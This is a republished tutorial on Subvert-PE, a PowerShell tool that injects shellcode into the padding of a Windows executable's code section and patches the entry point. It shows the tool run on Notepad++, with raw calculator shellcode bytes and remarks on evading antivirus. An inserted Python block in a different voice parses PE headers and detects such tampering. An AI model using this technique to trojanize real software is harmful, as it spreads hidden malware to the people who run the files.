2025-03-11 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Shulou(Shulou.com)05/31 Report--
This article shows how to use PowerShell PE injection to pop a calculator. The editor thinks it is very practical, so it is shared here as a reference.
We will look at programmatically injecting shellcode into a PE executable on disk. Note that we are only talking about exe files; the PE file format covers many other extensions (dll, ocx, sys, cpl, fon, ...). Doing this manually is simple; the key point is to make sure the functionality of the PE is unchanged so as not to arouse suspicion. But manual injection is often not practical: you need to make a copy of the PE, modify it on your own host, and then replace the file on the target machine. To simplify this process I created Subvert-PE, a script that automatically rewrites a PE executable (x86 and x64): it patches the entry point offset, injects shellcode, and returns the execution flow to the legitimate code. I prefer to give the tool to people who have a chance to understand how it works, so this article focuses on reviewing the relevant parts of the PE format. Once you understand the structure of a PE, modifying it with PowerShell is child's play.
This post may contain information, excerpts or images from the official Microsoft documentation, which is provided under the DMCA fair use policy. If anyone has any questions about this, please send me an email.
Link:
[Microsoft Official PE-COFF Documentation (MSDN)]
[Portable Executable (Corkami)]
Tools:
[Subvert-PE.ps1]
PE header
The best way to learn new material is to work through a concrete example. To lay the foundation, we will walk through the PE header of 32-bit Notepad++ step by step. PE headers usually consist of the following components: the MS-DOS header, the Rich signature, the PE header, the optional header and the section table.
I will not highlight every meaningful WORD/DWORD/QWORD in each part, since this is only a rough overview.
MS-DOS header:
In this example the DOS header extends from the start of the image (0x00) to 0x7F (127 bytes).
The important thing to remember here is that at offset 0x3C (60 bytes) there is a DWORD that holds the actual file offset of the PE header. The offset of the PE header is not fixed; it changes from binary to binary. For those interested, the static "MZ" identifier stands for Mark Zbikowski (his initials), one of the MS-DOS developers.
Rich signature (Rich Signature):
The Rich signature is mentioned here mainly out of curiosity. Although the PE format has a long history (Windows 3.1, 1993), this part is undocumented by Microsoft. In short, it stores data about how the PE was compiled. For an in-depth overview, read Daniel Pistelli's analysis at [NTCORE](http://www.ntcore.com/files/richsign.htm).
PE header:
The PE header consists of an ASCII signature followed by the standard COFF file header. Notice that there is null-byte padding between the Rich signature and the PE header. For Notepad++ the padding is 0x0F (15 bytes), but its size varies from PE to PE.
A more complete picture is provided below, where you can find all the possible values for "Machine Type" and "Characteristics". These come from the official Microsoft documentation.
Optional header:
The optional header provides loading information to the loader. It is "optional" only in name and is usually absent from object files. The size of the optional header varies and is given by the SizeOfOptionalHeader field in the PE header above.
Many fields are not highlighted; for a more complete overview, refer to Microsoft's official documentation and the picture below [Corkami Analysis], which shows all possible "Subsystem Type" field values.
Section table: the section table immediately follows the optional header. This is necessary because the image contains no pointer to it; its offset is calculated from the combined size of the PE headers. Each section entry is 0x28 (40 bytes) in size, and the number of sections is read from the PE header.
The picture below shows all possible section flag values, but usually only a few appear regularly (readable/executable, initialized data, discardable).
The table above shows only the first section of the Notepad++ PE; the other sections (4 in total) directly follow the ".text" section.
Manipulating binaries with Powershell
Now that we have a preliminary understanding of the PE header format, we can start looking at reading bytes from and writing bytes to binaries.
Byte arrays:
The first thing to look at is the conversion between hexadecimal bytes and integers.
Very interesting, but the main goal is still to edit files on disk. I created a simple 4-byte file to illustrate how to do it.
Editing the PE image
It's time to put the theory into practice. To tackle editing a PE image we will set ourselves a simple goal: find the offset of the module entry point and overwrite it with 0xAABBCCDD.
Running this script in the terminal produces the following result.
Let's see what happens when the PE is loaded in Immunity Debugger.
You will find that the entry point is not 0xAABBCCDD but 0xAAFBCCDD. This is to be expected: when the PE is loaded into memory, the entry point offset is added to the image base (0x00400000). From our point of view this is not important, because any dynamic calculations we do are automatically relative to the image base. Depending on rebasing/ASLR, this value can be static or dynamic.
Subvert-PE
It's time to take off! To modify the PE we need the following steps:
(1) calculate the offset from the first executable section to its null-byte padding;
(2) replace the module entry point with the offset calculated in the first step;
(3) write our shellcode at that offset;
(4) append a stub to the shellcode that jumps back to the legitimate entry point.
The picture below describes the above execution flow.
As mentioned in the introduction, performing these steps is no more complex than calculating offsets in a byte array. To do this I created a script (Subvert-PE) that dynamically modifies PE images and supports x86 and x64. The Subvert-PE function contains shellcode that starts the calculator, written by SkyLined. More details on this shellcode can be found here.
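The following Python is an added example, not code from the article or from Subvert-PE. It walks the headers described above (the DWORD at 0x3C, the COFF header, the optional header, the 0x28-byte section entries), maps an RVA to a file offset so the 0x00400000 image base discussion becomes concrete, and implements the defender-side check for exactly the modification the four steps above make: an entry point that lands in the null-byte padding of an executable section. The PE bytes are constructed inline (a minimal fake image, not a real binary); field offsets follow the PE-COFF specification.

```python
import struct
IMAGE_SCN_MEM_EXECUTE = 0x20000000   # section Characteristics flag from the PE-COFF spec

def build_sample_pe(entry_rva):
    # Constructed minimal PE32 (not a real binary): one .text section whose VirtualSize (0x30)
    # is smaller than its SizeOfRawData (0x200), so its raw data ends in null-byte padding.
    dos = bytearray(b"MZ") + bytearray(0x7E)
    struct.pack_into("<I", dos, 0x3C, 0x80)                 # e_lfanew -> PE header at 0x80
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section, opt hdr 0xE0
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)              # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x00400000)             # preferred ImageBase
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x30, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)              # code | execute | read
    hdr = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    hdr += b"\0" * (0x200 - len(hdr))                       # headers padded to FileAlignment
    return hdr + b"\x90" * 0x30 + b"\0" * (0x200 - 0x30)    # .text raw data plus padding

def parse_pe(data):
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]      # DWORD at 0x3C locates "PE\0\0"
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                     # optional header follows COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    fmt, off = ("<Q", 24) if magic == 0x20B else ("<I", 28)  # PE32+: QWORD at +24; PE32: DWORD at +28
    image_base = struct.unpack_from(fmt, data, opt + off)[0]
    sections = []
    for i in range(nsec):                                   # section table: 0x28 bytes per entry
        name, vsize, va, rawsz, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 0x28 * i)
        sections.append(dict(name=name.rstrip(b"\0").decode(), vsize=vsize, va=va,
                             rawsize=rawsz, rawptr=rawptr, chars=chars))
    return dict(entry_rva=entry_rva, image_base=image_base, sections=sections)

def rva_to_offset(pe, rva):
    # File offset for an RVA; once loaded, the address is image_base + rva (e.g. 0x00400000 + rva).
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    return None

def entry_point_in_slack(pe):
    # Detection check: entry point past VirtualSize but inside SizeOfRawData of an executable
    # section (its alignment padding), or inside no executable section at all, is suspicious.
    rva = pe["entry_rva"]
    for s in pe["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["va"] <= rva < s["va"] + s["rawsize"]:
            return rva >= s["va"] + s["vsize"]
    return True
```

Real linkers sometimes round VirtualSize up to the raw size, so treat a hit from this check as a lead to confirm in a debugger rather than proof on its own.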
Let's look at a practical example.
```text
PS C:\Users\b33f> . .\ToolKit\Subvert-PE.ps1
PS C:\Users\b33f> Get-Help Subvert-PE -Full
NAME
Subvert-PE
SYNOPSIS
Inject shellcode into a PE image while retaining the PE functionality.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Subvert-PE -Path <String> [-Write] [<CommonParameters>]
DESCRIPTION
Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry
Point. After the shellcode executes, program execution is handed back over to the legitimate PE entry
Point.
PARAMETERS
-Path <String>
Path to portable executable.
Required? True
Position? Named
Default value
Accept pipeline input? False
Accept wildcard characters?
-Write [<SwitchParameter>]
Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image
Base" and dump the memory at the null-byte location.
Required? False
Position? Named
Default value
Accept pipeline input? False
Accept wildcard characters?
This cmdlet supports the common parameters: Verbose, Debug
ErrorAction, ErrorVariable, WarningAction, WarningVariable
OutBuffer and OutVariable. For more information, type
"get-help about_commonparameters".
INPUTS
OUTPUTS
-------------------------- EXAMPLE 1 --------------------------
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe
-------------------------- EXAMPLE 2 --------------------------
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
RELATED LINKS
http://www.fuzzysecurity.com/
PS C:\Users\b33f> Subvert-PE -Path 'C:\Program Files\Notepad++\notepad++.exe' -Write
Legitimate Entry Point Offset: 0x000B7159
Preferred PE Image Base: 0x00400000
Null-Byte Padding dump:
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
Modified Entry Point Offset: 0x000DA6B6
Inject Far JMP: 0xe9fffdca54
Null-Byte Padding After:
31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76
AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C
24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74
1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
00 00 00
```
In the screenshot below we can see that Notepad++ starts normally and opens the calculator at the same time!
The screenshot below shows some sample injections on Windows 7 Professional 32-bit and Windows 8 Enterprise.
Note:
(1) On PE executables this script has a success rate of about 90%, but only a 50% success rate on 64-bit systems, because the null-byte padding is very small in x64 binaries. As a general rule, do not run the script with the "-Write" option straight away.
(2) Obviously the shellcode could be replaced with more valuable code, which is not covered here to avoid abuse. A few things to keep in mind: because we need to preserve the execution flow, the shellcode must not exit the process; since the shellcode sits in the PE's code section, which is not writable, it cannot decode itself in place; and in a few test cases the PE needed its initial register values to run correctly, so they have to be restored after the shellcode runs.
(3) Injecting into a signed binary invalidates the signature, but that is only a concern from a forensic point of view. Because the shellcode is hidden inside a custom executable, the antivirus has no way of knowing what is going on and happily lets the program run. I found that Comodo did notice the change to the PE and quarantined the executable, though it still allowed execution; I suspect it detected that the entry point had been tampered with.
(4) Don't mess around: this tool may only be used with authorization!